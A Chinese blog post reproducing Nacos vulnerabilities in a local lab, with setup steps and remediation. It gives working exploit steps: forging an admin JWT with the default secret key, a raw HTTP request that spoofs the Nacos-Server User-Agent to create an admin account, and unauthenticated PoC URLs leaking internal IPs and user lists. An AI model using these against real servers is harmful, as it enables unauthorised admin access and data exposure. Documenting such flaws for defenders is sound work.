NACOS搭建及相关漏洞复现

已于 2023-12-28 16:34:22 修改
阅读量1k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: Nacos漏洞复现
于 2023-10-30 11:04:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/B_l_a_nk/article/details/134114336
版权

目录

搭建过程

出现问题

解决问题

漏洞复现

身份认证绕过漏洞 (QVD-2023-6271)

漏洞描述

漏洞信息

漏洞影响范围:

漏洞复现

漏洞修复

Nacos权限认证绕过(CVE-2021-29441)

漏洞描述

漏洞影响范围

漏洞复现

漏洞修复

信息泄露

内网IP地址泄露

用户列表泄露

由于不同的漏洞复现需要不同版本的NACOS,这里先搭建2.2.0版本的NACOS

搭建过程

环境:Windows物理主机,不是虚拟机(不过都没啥区别,无论是Windows还是Linux,nacos都提供了)。

下载链接;Releases · alibaba/nacos · GitHub

首先在GitHub上面找到NACOS下载的地方,这里是有多个版本可供选择,我们直接选择2.2.0版本的nacos

下载完成之后解压得到文件nacos

来到bin目录下打开cmd执行命令startup.cmd -m standalone

如果是Linux的话也是来到bin目录下执行./startup.sh -m standalone

出现问题

它这里一直提示没有为JAVA_HOME配置环境变量,但我已经配置过了还是不行。

解决问题

根据网上的方法添加环境变量后无果,找到新的解决办法。

只需要在启动文件startup.cmd中设置变量JAVA_HOME的值为你电脑上的安装目录即可。

修改完成后成功启动

打开浏览器访问http://部署nacos的ip:8848/nacos

默认账号密码为nacos,nacos。

漏洞复现

身份认证绕过漏洞 (QVD-2023-6271)

漏洞描述

漏洞原理为开源服务管理平台 Naos在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。

漏洞信息

漏洞类型:身份认证绕过

漏洞等级:高危

漏洞编号:NVDB-CNVDB-2023674205

漏洞影响范围:

0.1.0<= Nacos<= 2.2.0基本上都受到了影响,最新的版本已修复漏洞。

漏洞的本质是因为使用了默认的key。

在受影响的版本范围内,nacos的token.secret.key值是固定死的,位置在conf下的 application.properties 中。

漏洞复现

首先构造JWT的值,将配置文件中的KEY那一行复制到下面,勾选base64编码

这里可能会有一个疑问,就是在真实环境下,不能去看对方的配置文件中的key,怎么来构造jwt呢

仔细想想就会知道,这个key是默认的,只要不是管理者手动修改了,默认就是这个。

首先Header中的值不用变,将payload中的sub改成”nacos“,exp换成时间戳,时间需要比当前时间往后,这里建议往后一天。最后的VERIFY SIGNATURE中的密钥改成上面默认的key。并且需要勾选base64编码。

这里的时间戳设置需要选择系统时间往后的一个时间,可以往后多算一天,

在线时间戳转换工具

接着我们来到burpsuite抓取登录包,账号密码就随便填一个错误的,然后抓取返回包

这里用一个错误账号密码去登录,然后选择Response to this request进行抓取返回包。

将刚刚获得正确返回包粘贴进来放包即可成功进入后台。

其实这里不用那么麻烦,直接在抓取登陆包加上token之后放包就进去后台了。刚才的方法有点麻烦了。

漏洞修复

更新到最新版本的Nacos,或者修改配置文件中token.secret.key的值。

Nacos权限认证绕过(CVE-2021-29441)

漏洞描述

Nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

漏洞影响范围

Nacos <= 2.0.0-ALPHA.1

漏洞复现

这里选取的版本是Nacos2.0.0-ALPHA.1

启动的方法跟刚才一样,也是需要修改启动文件startup.cmd中设置变量JAVA_HOME的值。

访问地址http://IP:8848/nacos/v1/auth/users?pageNo=1&pageSize=2

即可查看用户列表,账号为nacos,密码为加盐加密后的值

网上找的方法是访问一个地址,然后改post方法,把UA头的值换成Nacos-Server去添加账户。但是我没有成功不知道为啥。就用下面这个数据包才可以成功。

2023年12月28日更新,需要在数据包中加上Content-Type: application/x-www-form-urlencoded,就可以成功了。因为该参数是一种 HTTP 请求头中的标准内容类型,通常用于在 HTTP 请求中发送表单数据。这种类型的数据包含键值对,键值对之间使用 & 符号分隔,键和值之间使用 = 符号分隔。这种数据格式主要用于 HTML 表单提交。)

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.71.5:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

这里也是成功的创建了一个账户名为admin,密码为admin的账户

再来查看一下账户列表便可以发现admin已经添加上去了。

并且也是利用这个新创建的账户成功登录。

漏洞修复

升级到最新版本的Nacos

信息泄露

未在网上找寻到相关的版本信息,就是两个访问地址,实战中遇到nacos可访问一下,判断是否存在信息泄露。

内网IP地址泄露

在未登录的情况下访问url,查看nacos默认安装后泄露的内网ip地址,poc:

http://ip:8848/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageS%20ize=10&keyword

用户列表泄露

在未登录的情况下访问url,查看nacos默认安装后泄露的用户列表,poc:

http://ip:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9

xiaopeisec
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【安全漏洞CVE-2021-41773和CVE-2021-42013漏洞分析
HBohan的博客
10-16 2093
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
Alibaba Nacos未授权访问漏洞复现
锋刃科技的博客
01-16 8762
漏洞概述 Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 环境搭建 这里我们下载nacos2.0.0-ALPHA.1版本的 下载地址 https://github.com/alibaba/nacos/releases/download/2....
nacos 的两个源码版本:分别是 nacos-1.4.3 和 nacos-2.0.4
02-25
nacos 是 AliBaBa 为 SpringCLoud 打造的一个组件,用于 注充当注册中心和 配置中心
(附nuclei yaml文件)Nacos 身份认证绕过漏洞(CVE-2021-43116)漏洞复现
nglj9527的博客
05-20 603
Nасоѕ是一个专为动态服务发现和配置以及服务管理而设计的平台。在 Nасоѕ 1.4.1 之前的版本中,当配置为使用身份验证(-Dnасоѕ.соrе.аuth.еnаblеd=truе)时,Nасоѕ 使用 AuthFiltеr ѕеrvlеt 过滤器强制执行身份验证。该过滤器有一个后门,使 Nасоѕ 服务器能够绕过该过滤器,从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头,因此很容易被欺骗。此漏洞可能允许任何用户在 Nасоѕ 服务器上执行任何管理任务。。
nacos漏洞小结
qq_61475980的博客
07-01 1405
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。在路径后面加上可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图更改提交方式为POST, 访问新建一个账号test111,可以看到创建用户成功,如图更改提交方式为DELETE, 访问可以看到用户删除成功,如图更改提交方式为。
Nacos系统历史CVE漏洞复现分析与检测
道阻且长,行则将至。
02-07 2945
本文复现、分析、总结了 Nacos 近几年的历史 CVE 漏洞,可以看到大厂发布的开源系统并非“坚不可摧”,很多看似“合理”的业务需求会成为漏洞的发源地。作为开发或运维人员,在引入开源组件或系统到自身业务系统的时候,应该持续关注其是否爆出安全漏洞,并及时升级版本、修复漏洞
Nacos身份绕过漏洞复现(QVD-2023-6271)
qq_42751192的博客
08-19 222
Nacos 是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。
Nacos最新0day漏洞复现
qq_55213436的博客
07-16 3043
漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。
Nacos权限认证绕过漏洞复现
时乙的博客
03-12 2520
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
Alibaba Nacos权限认证绕过漏洞复现
逍遥小哥的博客
07-18 6370
是一个易于使用的平台,旨在用于动态服务发现,配置和服务管理。它可以帮助您轻松构建云本机应用程序和。2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。为什么会产生这个漏洞?1.认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
nacos集群搭建.zip
10-26
在本文中,我们将详细探讨 Nacos 集群搭建相关知识点。 **一、Nacos 集群概念** Nacos 集群是通过多台服务器协同工作来提高服务的可用性和数据的可靠性。在集群模式下,Nacos 实例之间会进行数据同步,确保即使...
Springcloud seata nacos环境搭建过程图解
08-19
Spring Cloud Seata Nacos 环境搭建过程详解 Spring Cloud Seata Nacos 环境搭建是当前微服务架构中非常重要的一部分。本文将详细介绍 Spring Cloud Seata Nacos 环境搭建过程,并提供了详细的示例代码,旨在帮助...
seata 1.7 基于springcloud 和nacos搭建的客户端
11-17
3. **配置 Seata:** 在 Nacos 中创建 Seata 相关的配置,如 TC、TM、RM 的配置信息。 4. **开启 Seata 客户端:** 在 Spring Cloud 应用中启用 Seata 客户端,配置 TM 和 RM,使得应用能够感知 Seata 服务。 5. **...
nacos集群搭建资料
11-16
本篇将详细讲解如何搭建Nacos集群,以及在这个过程中涉及的关键知识点。 一、Nacos简介 Nacos的核心功能包括服务发现和服务配置,为微服务提供了动态配置、服务发现、健康检查等能力。其设计目标是简化开发人员和...
k8s搭建Nacos集群
05-26
k8s搭建Nacos集群,制作Java运行容器镜像,再制作Nacos镜像 Nacos版本是:2.1.0 说明: 如果想搭建:2.2.0也根据文档步骤操作即可
nacos 1day保姆级复现
jnszstmei的博客
07-20 869
NACOS是一个开源的服务发现、配置管理和服务治理平,属于阿里巴巴的一款开源产品2.3.2版本的nacos存在远程代码执行漏洞,攻击者可以在远程服务器上执行任意代码,进而让攻击者完全控制受影响的系统,导致严重的安全问题。
骨折多区域X线图片资料数据集
最新发布
08-02
骨折多区域X线图片资料数据集 数据说明: 该数据集包含10,580张射线图像(X射线)数据。 培训数据 图片数量:9246 验证数据 图片数量:828 测试数据 图片数量:506
[毕业设计]JAVA实现的局域网监听与审计系统(源代码+论文).zip
08-02
[毕业设计]JAVA实现的局域网监听与审计系统(源代码+论文)
c语言实现 http 服务器,项目需求
05-15
C语言是一种高效的编程语言,能够实现各种基于网络的系统,其中一个典型的应用是HTTP服务器。实现HTTP服务器需要满足以下项目需求: 1. 支持HTTP协议 HTTP协议定义了Web服务器和Web浏览器之间的通信协议,因此服务器必须支持HTTP协议。该服务器应该能够理解HTTP请求格式和响应格式。 2. 处理多个客户请求 HTTP服务器应该支持同时处理多个客户机的请求,以满足现代Web应用的需求。服务器可以使用多线程或多进程来处理这些请求。 3. 处理不同类型的HTTP请求 HTTP服务器应该支持处理GET和POST请求。GET请求用于检索服务器上的数据,而POST请求用于向服务器发送数据。 4. 支持静态和动态Web内容 HTTP服务器应该能够处理动态Web内容,例如CGI脚本和其他Web编程语言,以获得更多的交互性和可定制性。它也应该支持静态Web内容,例如HTML和图像文件。 5. 支持虚拟主机 HTTP服务器应该支持虚拟主机,以便在单个服务器上托管多个域名。 6. 安全性 HTTP服务器应该支持安全协议,例如HTTPS,以提供数据保护和数据加密。 综上所述,HTTP服务器应该满足以上几个项目需求,才能够满足现代Web应用程序的要求,并提供可靠的服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaopeisec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值